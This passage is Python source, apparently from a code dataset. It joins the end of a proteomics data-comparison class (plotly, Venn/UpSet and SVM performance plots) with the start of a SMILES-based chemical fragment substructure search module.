Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"], categories=multi_choice, ordered=True))
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "type"], ascending=[True, False], inplace=True)
layout = go.Layout(barmode="overlay",
#xaxis_tickangle=90,
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
filtered = list(np.tile(["id","profile"],len(multi_choice)))
fig_quantity_pg = px.bar(df_quantity_pr_pg_combined, x="Expxfiltering", y="number of protein groups",
color="Experiment", barmode="overlay", hover_data=["type"],
opacity=0.8, color_discrete_sequence=px.colors.qualitative.D3)
fig_quantity_pg.update_layout(layout, title="Number of Protein Groups",
xaxis={"tickmode":"array", "tickvals":[el for el in range(len(multi_choice)*2)],
"ticktext":filtered, "title": {"text": None}})
fig_quantity_pr = px.bar(df_quantity_pr_pg_combined, x="filtering", y="number of profiles",
color="type", barmode="overlay", labels={"Experiment":"", "filtering":""},
facet_col="Experiment",template="simple_white", opacity=1)\
.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig_quantity_pr.update_layout(layout, title="Number of Profiles" )
return fig_quantity_pg, fig_quantity_pr
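# Illustrative usage sketch (instance name `comp` is hypothetical); two figures are returned:
#
#     fig_pg, fig_pr = comp.quantity_pr_pg_barplot_comparison(multi_choice=["Exp1", "Exp2"])
#     fig_pg.show()
#     fig_pr.show()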
def coverage_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing data completeness of profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_pr_dc: barplot, data completeness of profiles before/after filtering of the intersection/total quantity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)].sort_values("filtering")
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"],
categories=multi_choice, ordered=True))
#df_quantity_pr_pg_combined.sort_values("Experiment_lexicographic_sort", inplace=True)
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "filtering"], inplace=True)
fig_pr_dc = px.bar(df_quantity_pr_pg_combined.loc[df_quantity_pr_pg_combined.type=="total"], x="Experiment", y="data completeness of profiles",
color="Experiment", barmode="overlay", hover_data=["filtering"],
template="simple_white", opacity=0.8)
fig_pr_dc.update_layout(#barmode="overlay",
#xaxis_tickangle=90,
title="Profile completeness of all<br>identified protein groups",
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
return fig_pr_dc
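# Illustrative usage sketch (instance name `comp` is hypothetical):
#
#     fig_dc = comp.coverage_comparison(multi_choice=["Exp1", "Exp2"])
#     fig_dc.show()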
def venn_sections(self, multi_choice_venn=["Exp1"]):
"""
UpsetPlot is created based on a list of experiments. If 2 or 3 experiments are given, the UpsetPlot displays all possible
mutually exclusive overlapping combinations of these experiments. Additionally, a Venn diagram is created using matplotlib.
The latter figure has to be converted from a matplotlib object to a jpg, to make it available for the web interface via panel/holoviz.
If more than 3 experiments are given, the UpsetPlot will be calculated only for those combinations of these experiments with at least 300 entries.
Another way to think of this is the mutually exclusive sections of a venn diagram of the sets. If the original list has N sets,
the returned list will have (2**N)-1 sets.
Args:
multi_choice_venn: list of experiment names
self:
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
Returns:
im: Venn diagram, made available for plotly/web interface
figure_UpSetPlot: Upsetplot figure
combinations : list of tuple
tag : str
Binary string representing which sets are included / excluded in
the combination.
set : set
The set formed by the overlapping input sets.
"""
def create_upsetplot(sets, multi_choice):
num_combinations = 2 ** len(sets)
bit_flags = [2 ** n for n in range(len(sets))]
flags_zip_sets = [z for z in zip(bit_flags, sets)]
combo_sets = []
overlapping_ids = []
experiments = []
#dictio = {}
for bits in range(num_combinations - 1, 0, -1):
include_sets = [s for flag, s in flags_zip_sets if bits & flag]
exclude_sets = [s for flag, s in flags_zip_sets if not bits & flag]
combo = set.intersection(*include_sets)
combo = set.difference(combo, *exclude_sets)
tag = "".join([str(int((bits & flag) > 0)) for flag in bit_flags])
experiment_decoded = []
for digit, exp in zip(list(tag), multi_choice):
if digit=="0":
continue
else:
experiment_decoded.append(exp)
#dictio[len(combo)] = experiment_decoded
if len(multi_choice)>3:
if len(combo)>300:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
else:
if len(combo)>0:
overlapping_ids.append(len(combo))
experiments.append(experiment_decoded)
#combo_sets.append((tag, len(combo)))
fig_UpSetPlot = plt.Figure()
series_UpSetPlot = from_memberships(experiments, data=overlapping_ids)
upplot(series_UpSetPlot, fig=fig_UpSetPlot, show_counts="%d")
return fig_UpSetPlot
if "Sequence" not in self.df_01_filtered_combined.index.names:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Protein IDs"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Protein IDs")) for i in multi_choice_venn]
else:
sets_proteins_total = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").index.get_level_values("Sequence"))
for i in multi_choice_venn]
sets_proteins_intersection = [set(self.df_01_filtered_combined.xs(i, axis=0, level="Experiment").unstack(["Map", "Exp_Map"]).dropna()\
.index.get_level_values("Sequence")) for i in multi_choice_venn]
figure_UpSetPlot_total = create_upsetplot(sets_proteins_total, multi_choice_venn)
figure_UpSetPlot_int = create_upsetplot(sets_proteins_intersection, multi_choice_venn)
#make matplot figure available for plotly
def convert_venn_jpg(vd):
vd = vd.figure
out_img = BytesIO()
plt.savefig(out_img, bbox_inches="tight",format="jpg", dpi=72)
out_img.seek(0) # rewind file
im = Image.open(out_img)
plt.clf()
return im
if len(multi_choice_venn) == 2:
vd_t = venn2(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn2(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:2], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
elif len(multi_choice_venn) == 3:
vd_t = venn3(sets_proteins_total, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_t = plt.title("in at least one map")
im_t = convert_venn_jpg(vd_t)
vd_i = venn3(sets_proteins_intersection, set_labels=([i for i in multi_choice_venn]),
set_colors=px.colors.qualitative.D3[0:3], alpha=0.8)
vd_i = plt.title("in all maps")
im_i = convert_venn_jpg(vd_i)
else:
im = "Venn diagram can be displayed for 3 Experiments or less"
return im,im, figure_UpSetPlot_total, figure_UpSetPlot_int
return im_t, im_i, figure_UpSetPlot_total, figure_UpSetPlot_int
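# Illustrative usage sketch (instance name `comp` is hypothetical): for up to three
# experiments both Venn images and both UpSet plots are returned.
#
#     im_total, im_intersection, upset_total, upset_intersection = comp.venn_sections(
#         multi_choice_venn=["Exp1", "Exp2"])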
def dynamic_range_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], ref_exp="Exp1"):
"""
A box plot for desired experiments (multi_choice) and all protein clusters is generated displaying the dynamic range
Args:
self:
multi_choice: list of experiment names
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
Returns:
fig_dynamic_range: bar plot, dynamic range of each protein cluster for desired experiments is displayed.
"""
df_dynamicRange_combined = self.df_dynamicRange_combined.copy()
df_dynamicRange_combined = df_dynamicRange_combined[df_dynamicRange_combined["Experiment"].isin(multi_choice)]
df_dynamicRange_combined = df_dynamicRange_combined.assign(Experiment_lexicographic_sort = pd.Categorical(df_dynamicRange_combined["Experiment"],
categories=multi_choice, ordered=True))
df_dynamicRange_combined.sort_values(["Experiment_lexicographic_sort", "Dynamic Range"], inplace=True)
fig_dynamic_range = px.bar(df_dynamicRange_combined,
x="Cluster",
y="Dynamic Range",
base="Min",
facet_row="Experiment",
template="simple_white",
height=400*len(multi_choice),
width=1200)
df_dynamicRange_combined_ref = df_dynamicRange_combined.drop(["Experiment_lexicographic_sort"], axis=1)
df_dynamicRange_combined_ref = df_dynamicRange_combined.set_index(["Cluster", "Experiment"], drop=False).unstack("Cluster")["Dynamic Range"]
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.div(df_dynamicRange_combined_ref.xs(ref_exp))
df_RelDynamicRange = pd.concat([df_dynamicRange_combined_ref.median(axis=1), df_dynamicRange_combined_ref.sem(axis=1)], axis=1,
keys=["Dynamic Range (rel, median)", "SEM"]).reset_index()
if collapse_cluster == False:
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.stack("Cluster")
df_dynamicRange_combined_ref.name="Normalized Dynamic Range"
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.reset_index()
fig_RelDynamicRange = px.bar(df_dynamicRange_combined_ref,
x="Cluster",
y="Normalized Dynamic Range",
title="Dynamic Range - normalization to reference experiment: {}".format(ref_exp),
barmode="group",
template="simple_white",
color="Experiment")
fig_RelDynamicRange.update_xaxes(categoryorder="total ascending")
fig_RelDynamicRange.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
else:
fig_RelDynamicRange = px.bar(df_RelDynamicRange.sort_values("Dynamic Range (rel, median)"),
x="Experiment",
y="Dynamic Range (rel, median)",
error_x="SEM", error_y="SEM",
template="simple_white",
title="Dynamic Range - median of all individual normalized medians - reference experiment: {}".format(ref_exp),
color="Experiment")
fig_RelDynamicRange.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return pn.Column(pn.Row(fig_dynamic_range), pn.Row(fig_RelDynamicRange))
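# Illustrative usage sketch (instance name `comp` is hypothetical): a panel Column holding
# the absolute and the reference-normalized dynamic-range figures is returned.
#
#     col = comp.dynamic_range_comparison(collapse_cluster=True,
#                                         multi_choice=["Exp1", "Exp2"], ref_exp="Exp1")
#     col  # display in a notebook, or col.show() from a script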
def calculate_global_scatter(self, multi_choice, metric, consolidation):
"""
A distribution plot of the profile scatter in each experiment is generated, with variable distance metric and consolidation of replicates.
Args:
self:
df_01_filtered_combined: df, indexed
multi_choice: list of experiment names
metric: distance metric, one of 'euclidean distance', 'manhattan distance', '1 - cosine correlation', '1 - pearson correlation', 'manhattan distance to average profile', 'manhattan distance to median profile'
consolidation: method to consolidate replicate distances, one of 'median', 'average', 'sum'
Returns:
plot: plotly figure_factory.create_distplot figure, shows kernel density estimation in the main pane and a rug plot underneath. Traces are sorted by ascending median of the distribution.
"""
# Option dictionaries
cons_functions = {
"median": np.median,
"average": np.mean,
"sum": np.sum
}
metrics = {
"euclidean distance": "euclidean",
"manhattan distance": "manhattan",
"1 - cosine correlation": "cosine",
"1 - pearson correlation": lambda x,y: 1-np.corrcoef(x,y)[0][1],
"manhattan distance to average profile": [np.mean, pw.paired_manhattan_distances],
"manhattan distance to median profile": [np.median, pw.paired_manhattan_distances]
}
# Option assertion
assert consolidation in cons_functions.keys()
assert metric in metrics.keys()
# Filter experiments and intersection of proteins
df = self.df_01_filtered_combined.loc[
self.df_01_filtered_combined.index.get_level_values("Experiment").isin(multi_choice)].copy()
df.index = df.index.droplevel(["Exp_Map", "Gene names", "Compartment"])
if "Sequence" in df.index.names:
df.index = df.index.droplevel(["Protein IDs"])
df_across = df.unstack(["Experiment", "Map"]).dropna().stack(["Experiment", "Map"])
nPG = df_across.unstack(["Experiment", "Map"]).shape[0]
# Calculate and consolidate distances
distances = pd.DataFrame()
for exp in multi_choice:
df_m = df_across.xs(exp, level="Experiment", axis=0)
maps = list(set(df_m.index.get_level_values("Map")))
# this if clause switches between pairwise comparisons of profiles (else) and comparisons to an average/median profile
if " to " in metric:
df_m = df_m.unstack("Map")
# calculate reference profiles
df_profiles = df_m.stack("Fraction").apply(metrics[metric][0], axis=1).unstack("Fraction")
# calculate the distance for every map
distances_m = pd.DataFrame()
for m in maps:
dist_m = pd.DataFrame(metrics[metric][1](df_m.xs(m, level="Map", axis=1), df_profiles), columns = [m])
distances_m = pd.concat([distances_m, dist_m], axis=1)
distances_m.index = df_m.index
else:
distances_m = pd.DataFrame()
# loop over pairs of maps
for i,mapi in enumerate(maps):
for j,mapj in enumerate(maps):
# only look at each comparison once
if j <= i:
continue
dist = pw.paired_distances(df_m.xs(mapi, level="Map", axis=0).values,
df_m.xs(mapj, level="Map", axis=0).values,
metric = metrics[metric])
dist = pd.Series(dist, name="_".join([mapi,mapj]))
distances_m = pd.concat([distances_m, dist], axis=1)
distances_m.index = df_m.xs(maps[0], level="Map", axis=0).index
distances = pd.concat([distances, pd.Series(distances_m.apply(cons_functions[consolidation], axis=1), name=exp)], axis=1)
distances.index = distances_m.index
self.distances = distances
# Create and return plot
plot = ff.create_distplot(distances.T.values, distances.columns, show_hist=False)
plot.update_layout(title="Distribution of {} {}s, n = {}".format(metric, consolidation, nPG),
width=1500, height=600, template="simple_white", xaxis={"rangemode": "nonnegative"})
return plot
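# Illustrative usage sketch (instance name `comp` is hypothetical); metric and consolidation
# must be keys of the option dictionaries defined above:
#
#     plot = comp.calculate_global_scatter(multi_choice=["Exp1", "Exp2"],
#                                          metric="manhattan distance",
#                                          consolidation="median")
#     plot.show()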
def svm_processing(self):
"""
The misclassification matrix, generated by Perseus, will be used for Recall/Precision calculation of each individual cluster and on a global level.
Data will be stored in a local dictionary that will be assigned to the global dictionary.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
self.analysed_datasets_dict:
local dictionary (SVM_dict) will be assigned to the global dictionary self.analysed_datasets_dict, that is available for downloading
{"Experiment name" : {see def read_jsonFile(self) [below]}
{"Misclassification Analysis":
{
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {...}
}
}
}
"""
global_SVM_dict_total = {}
global_SVM_dict = {}
for exp in self.json_dict.keys():
try:
df_SVM = pd.read_json(self.json_dict[exp]["Misclassification Matrix"])
df_SVM["T: True group"] = df_SVM["T: True group"].str.replace(r'True: ', '')
except KeyError:
continue
SVM_dict = {}
all_correct = np.diag(df_SVM)
members = df_SVM.sum(axis=1)
total_members = 0
membrame_members = 0
membrane_correct = 0
all_organelle_recall = []
all_organelle_precision = []
all_organelle_f1 = []
F1_all_cluster = []
no_of_membrane_clusters = 0
total_correct = sum(all_correct)
predicted_one_organelle = df_SVM.sum(axis=0)
for i in range(len(df_SVM)):
total_members = total_members + members[i]
recall = all_correct[i]/members[i]
fdr = (predicted_one_organelle[i]-all_correct[i])/predicted_one_organelle[i]
precision = 1-fdr
F1 = statistics.harmonic_mean([recall, precision])
F1_all_cluster.append(F1)
SVM_dict[df_SVM["T: True group"][i]] = {"Recall": recall, "FDR": fdr, "Precision": precision, "F1": F1}
if df_SVM["T: True group"][i]!="Nuclear pore complex" and df_SVM["T: True group"][i]!="Large Protein Complex" and df_SVM["T: True group"][i]!="Actin binding proteins" :
no_of_membrane_clusters = no_of_membrane_clusters+1
membrame_members = membrame_members + members[i]
membrane_correct = membrane_correct + all_correct[i]
all_organelle_f1.append(F1)
all_organelle_recall.append(recall)
all_organelle_precision.append(precision)
total_recall = total_correct/total_members
membrane_recall = membrane_correct/membrame_members
av_per_organelle_recall = statistics.mean(all_organelle_recall)
median_per_organelle_recall = statistics.median(all_organelle_recall)
av_per_organelle_precision = statistics.mean(all_organelle_precision)
avg_organelle_f1 = statistics.mean(all_organelle_f1)
avg_F1_all_cluster = statistics.mean(F1_all_cluster)
SVM_dict_total = {}
SVM_dict_total["Avg. all clusters"] = {"Recall": total_recall, "F1": avg_F1_all_cluster} #total recall = marker prediction accuracy
SVM_dict_total["Avg. all organelles"] = {"Recall": av_per_organelle_recall, "F1": avg_organelle_f1, "Precision": av_per_organelle_precision}
SVM_dict_total["Membrane"] = {"Recall": membrane_recall}
SVM_dict_total["Median. per organelle"] = {"Recall": median_per_organelle_recall}
global_SVM_dict[exp] = SVM_dict
global_SVM_dict_total[exp] = SVM_dict_total
self.global_SVM_dict = global_SVM_dict
self.global_SVM_dict_total = global_SVM_dict_total
if global_SVM_dict=={}:
self.cache_stored_SVM = False
return
else:
df_clusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict[i][j]
for i in global_SVM_dict.keys()
for j in global_SVM_dict[i].keys()},
orient='index')
df_clusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_clusterPerformance_global = df_clusterPerformance_global.T
df_AvgClusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict_total[i][j]
for i in global_SVM_dict_total.keys()
for j in global_SVM_dict_total[i].keys()},
orient='index')
df_AvgClusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_AvgClusterPerformance_global = df_AvgClusterPerformance_global.T
self.cache_stored_SVM = True
return
def svm_plotting(self, multi_choice):
"""
The marker performance (line/scatter plot) as well as the marker prediction accuracy (bar plot) are visualized.
Args:
self: df_AvgClusterPerformance_global
df_clusterPerformance_global
multi_choice: list of experiment names
"""
df_clusterPerformance_global = self.df_clusterPerformance_global
df_AvgClusterPerformance_global = self.df_AvgClusterPerformance_global
df_AvgAllCluster = df_AvgClusterPerformance_global.xs("Avg. all clusters", level='Type', axis=1)
fig_markerPredictionAccuracy = go.Figure()#data=[go.Bar(x=df_test.columns, y=df_test.loc["Recall"])])
for exp in multi_choice:
fig_markerPredictionAccuracy.add_trace(go.Bar(x=[exp], y=[df_AvgAllCluster[exp].loc["Recall"]], name=exp))
fig_markerPredictionAccuracy.update_layout(template="simple_white", #showlegend=False,
title="Marker prediction accuracy - Overall recall",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Marker prediction accuracy [%]",
mirror=True),
)
fig_clusterPerformance = go.Figure()
list_data_type = ["Avg. all clusters", "Avg. all organelles"]
for i,exp in enumerate(multi_choice):
df_clusterPerformance = df_clusterPerformance_global.xs(exp, level='Experiment', axis=1)
df_AvgClusterPerformance = df_AvgClusterPerformance_global.xs(exp, level='Experiment', axis=1)
fig_clusterPerformance.add_trace(go.Scatter(x=df_clusterPerformance.columns, y=df_clusterPerformance.loc["F1"],
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i]), name=exp))
for data_type in list_data_type:
fig_clusterPerformance.add_trace(go.Scatter(x=[data_type], y=[df_AvgClusterPerformance[data_type].loc["F1"]],
mode="markers",
showlegend=False,
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i])
))
fig_clusterPerformance.update_layout(template="simple_white", #showlegend=False,
title="Cluster wise SVM analysis",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="F1 score", #- harmonic mean of recall and precision
mirror=True),
)
return fig_markerPredictionAccuracy, fig_clusterPerformance
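# Illustrative usage sketch (instance name `comp` is hypothetical): svm_processing() has to be
# run first so that the global cluster-performance dataframes exist.
#
#     comp.svm_processing()
#     if comp.cache_stored_SVM:
#         fig_accuracy, fig_cluster = comp.svm_plotting(multi_choice=["Exp1", "Exp2"])
#         fig_accuracy.show()
#         fig_cluster.show()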
def __repr__(self):
return str(self.__dict__)
#return "This is a spatial dataset with {} lines.".format(len(self.df_original))
def svm_heatmap(df_SVM):
"""
The misclassification matrix, generated by Perseus, will be displayed as a heatmap.
Args:
df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
fig_SVMheatmap: heatmap of the misclassification matrix
"""
#df_SVM = self.df_SVM.copy()
#if hasattr(df_SVM, "keys") == True:
try:
df_SVM = pd.read_json(df_SVM["Misclassification Matrix"])
df_SVM = df_SVM.set_index("T: True group")[::-1]
except:
df_SVM = df_SVM.set_index("T: True group")[::-1]
y_axis_label = df_SVM.index
x_axis_label = df_SVM.columns
data_svm = df_SVM.values
fig_SVMheatmap = go.Figure()
fig_SVMheatmap.add_trace(go.Heatmap(
z=data_svm,
x = x_axis_label,
y = y_axis_label,
colorscale=[
[0.0, "green"],
[0.01, "white"],
[1.0, "red"]
],
))
return fig_SVMheatmap
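# Illustrative usage sketch (the dictionary `json_dict` and the key "Exp1" are hypothetical):
# the function accepts either a json entry containing a "Misclassification Matrix" or the
# misclassification matrix dataframe itself.
#
#     fig = svm_heatmap(json_dict["Exp1"])
#     fig.show()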
def reframe_df_01_fromJson_for_Perseus(json_dict):
"""
Make 0-1 normalized data from all experiments available for Perseus
Args:
json_dict: dictionary, json file uploaded in the manage dataset tab.
Return:
df: 0-1 normalized data (globally normalized), with Gene names, Protein IDs, Compartment as columns
Pattern for Column data: Exp_Map_Fraction
"""
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data" and exp_name == list(json_dict.keys())[0]:
df_01_combined = pd.read_json(json_dict[exp_name][data_type])
df_01_combined = df_01_combined.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
df_01_combined = df_01_combined.drop([col for col in df_01_combined.columns if not col.startswith("normalized profile")], axis=1)
df_01_combined.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_combined.columns], names=["Set", "Map", "Fraction"])
df_01_combined.rename(columns = {"normalized profile":exp_name}, inplace=True)
elif data_type == "0/1 normalized data" and exp_name != list(json_dict.keys())[0]:
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd = df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
df_01_toadd = df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")], axis=1)
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_combined = pd.concat([df_01_combined, df_01_toadd], axis=1)
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
df = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
df = df.div(df.sum(axis=1), axis=0)
index_ExpMap = df.index.get_level_values("Experiment")+"_"+df.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df.set_index(index_ExpMap, append=True, inplace=True)
df.index = df.index.droplevel(["Map", "Experiment"])
df = df.stack("Fraction").unstack(["Exp_Map", "Fraction"])
df.columns = ["_".join(col) for col in df.columns.values]
return df
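# Illustrative usage sketch (file names are placeholders): load an exported analysis json
# and write a tab-separated table that can be imported into Perseus.
#
#     import json
#     with open("AnalysedDatasets.json") as f:
#         json_dict = json.load(f)
#     df_perseus = reframe_df_01_fromJson_for_Perseus(json_dict)
#     df_perseus.to_csv("perseus_input.txt", sep="\t")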
|
py | 1a4fb284afe55a711b6a5f7dc0876436f3dd0e42 |
from src.smiles_to_structure import convert_to_structure, MoleculeStructure, Fragment
from collections import Counter
from termcolor import cprint
from src.fragments_library import special_cases, biomolecules, peptide_amino_acids, heterocycles, \
common_aromatic_heterocycles, generalized_heterocycles, arenes, functional_groups, hydrocarbons, aromatic_fragments
'''The find_fragment method allows a substructure search of a given chemical fragment within a molecule
(subgraph isomorphism). Takes the SMILES strings of the fragment and the molecule as inputs.
The fragmentize method allows a library of fragments to be searched for within a molecule via the find_fragment method.
Takes the SMILES string of a molecule and fragment libraries as *args as inputs.
The fragment library should be ordered hierarchically, with more complex fragments being searched first. Atoms found in
any given substructure search are marked as discovered and are not used in further substructure searches (unless
specified as "phantom atoms", see fragments_library).
The method will return a list of names of the fragments found and the labeled molecular structure as a tuple
-> (fragment_names_list, labeled_structure)
If numeric=True, will return a vector with the count of the number of each fragment found and the labeled molecular
structure as a tuple
-> (fragment_vector, labeled_structure)
'''
class AtomData:
def __init__(self, symbol):
self.symbol = symbol
self.bond = None
self.daughter_branches = []
self.ring_closures = set()
self.phantom_bonds = None
self.phantom_atom = False
class Branch:
def __init__(self, bond):
self.bond = bond
self.sequence = []
def abbr_bond(bond):
return bond.bond_code, bond.atom.symbol
# bond_atom_info is the atom_info of the atom for the bond being checked (to see if it's a phantom bond/discovered)
def check_bond(bond, map_bond, bond_atom_info):
# if the bond.atom is discovered already, it should give back false (can't retread over discovered atoms)
# unless the atom_info for that atom shows that the bond.atom should be a phantom atom (which can be searched for in discovered atoms)
if bond.atom.discovered:
if not bond_atom_info.phantom_atom:
return False
if abbr_bond(bond) == map_bond:
return True
# need to cover (correct, R) (correct, Q) (9, R) (9, Q) (9, correct)
elif bond.bond_code == map_bond[0] or map_bond[0] == 9: # covers (correct, R) (correct, Q) (9, R) (9, Q)
if map_bond[1] == "R":
return True
elif map_bond[1] == "Q" and bond.atom.heteroatom:
return True
elif bond.atom.symbol == map_bond[1]:
if map_bond[0] == 9:
return True
else:
return False
def calc_branch_length(branch):
branch_length = 0
def add_daughter_branch_length(daughter_branch):
nonlocal branch_length
branch_length += len(daughter_branch.sequence)
if len(daughter_branch.sequence[-1].daughter_branches) > 0:
for b in daughter_branch.sequence[-1].daughter_branches:
add_daughter_branch_length(b)
add_daughter_branch_length(branch)
return branch_length
def find_fragment(fragment_string, molecule_string, fragment_name, structure=None, verbose=False):
verbose_bin = []
if structure:
molecule_structure = structure
else:
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragment_structure = convert_to_structure(MoleculeStructure(), fragment_string)
def find_anchor_atom(fragment):
for ele in ["Si", "P", "p", "S", "s", "I", "Br", "Cl", "F", "B", "b", "O", "o", "N", "n", "C", "c", "R"]:
for atom in fragment.atom_list:
if atom.symbol == ele:
return atom
fragment_anchor_atom = find_anchor_atom(fragment_structure)
# the actual atom object of highest priority in the fragment structure
def is_potential_anchor(atom, fragment_anchor_atom, atom_list):
# searches through all atoms in molecules in total_molecule to see if they match the fragment base atom
# atom -> current atom its checking
# atom_list is list where potential anchor atoms are stored
# fragment_anchor_atom is the actual atom object from the fragment structure
if atom.discovered and not fragment_anchor_atom.phantom_atom: # if fragment_anchor atom is a phantom atom, it can use discovered atoms as potential anchors
return
# atom has already been used to find a fragment
if atom.symbol != fragment_anchor_atom.symbol and fragment_anchor_atom.symbol != 'R': # TODO what about if anchor atom is Q!??
return
# check to see if atom is the same element
fragment_anchor_atom_bonds = Counter([abbr_bond(bond) for bond in fragment_anchor_atom.bonded_to])
# count bonds from anchor atom
atom_bonds = Counter([abbr_bond(bond) for bond in atom.bonded_to])
# count bonds in potential anchor atom where the bond's atom haven't been discovered yet (as we won't be able to use those bonds)
for key in fragment_anchor_atom_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this???
if key not in atom_bonds or fragment_anchor_atom_bonds[key] > atom_bonds[key]:
# check 1: are there bonds types in fragment base atom that current atom doesn't have
# check 2: does current atom have >= the amount of each bond type compared to fragment base atom
# i.e. are the bonds in fragment anchor atom a subset of the bonds of current atom
return
atom_list.append(atom)
# if all checks passed, atom is a potential base atom and is stored in a list
potential_anchor_atoms = []
# keeping track of atoms that match fragment base atom
for atom in molecule_structure.atom_list:
is_potential_anchor(atom, fragment_anchor_atom, potential_anchor_atoms)
if potential_anchor_atoms == []:
verbose_bin.append("no anchor atoms found")
return 0
else:
verbose_bin.append("potential anchor atoms: ")
for atom in potential_anchor_atoms:
verbose_bin.append(atom.symbol)
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
def map_fragment(fragment, anchor_atom):
visited = {}
for atom in fragment.atom_list:
visited[atom] = False
# keeps track of which atoms have been visited
atom_info_dict = {}
# links the molecule_atom and the atom_info representing that atom, used to pass ring_closure info to map
ring_closure_counter = 1
def traverse(current_atom, previous_atom, current_branch):
visited[current_atom] = True
current_atom_data = AtomData(current_atom.symbol)
# data object for current atom
# atom_data will reflect that the atom is a phantom_atom
if current_atom.phantom_atom:
current_atom_data.phantom_atom = True
atom_info_dict[current_atom] = current_atom_data
if current_branch:
current_branch.sequence.append(current_atom_data)
# append atom info to branch sequence
# if current_branch b/c first atom does not have a branch
current_atom_data.phantom_bonds = current_atom.phantom_bonds
unchecked_bonds = [bond for bond in current_atom.bonded_to if bond.atom != previous_atom]
nonlocal ring_closure_counter
# if more than 1 unchecked bonds (i.e. a branch point), create new branch for each unchecked bond
if len(unchecked_bonds) > 1:
for bond in unchecked_bonds:
if not visited[bond.atom]:
verbose_bin.append("new branch")
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
elif not bool(current_atom_data.ring_closures & atom_info_dict[bond.atom].ring_closures):
# if visited[bond.atom], we are at a ring closure
# this bool sees if the atom_info of these two atoms (current atom and the atom its bonded to) share any values (& operator)
# if they do, this ring closure has already been documented and we don't want to double count it
verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, bond.bond_code))
atom_info_dict[bond.atom].ring_closures.add((ring_closure_counter, bond.bond_code))
# add matching values to each atom_info.ring_closure
# ring closure data in format (ring closure #, bond_code)
ring_closure_counter += 1
# if a contiguous section of branch, add bond info
elif len(unchecked_bonds) == 1:
if current_branch:
if not visited[unchecked_bonds[0].atom]:
verbose_bin.append("continue branch")
current_atom_data.bond = abbr_bond(unchecked_bonds[0])
traverse(unchecked_bonds[0].atom, current_atom, current_branch)
elif not bool(current_atom_data.ring_closures & atom_info_dict[unchecked_bonds[0].atom].ring_closures):
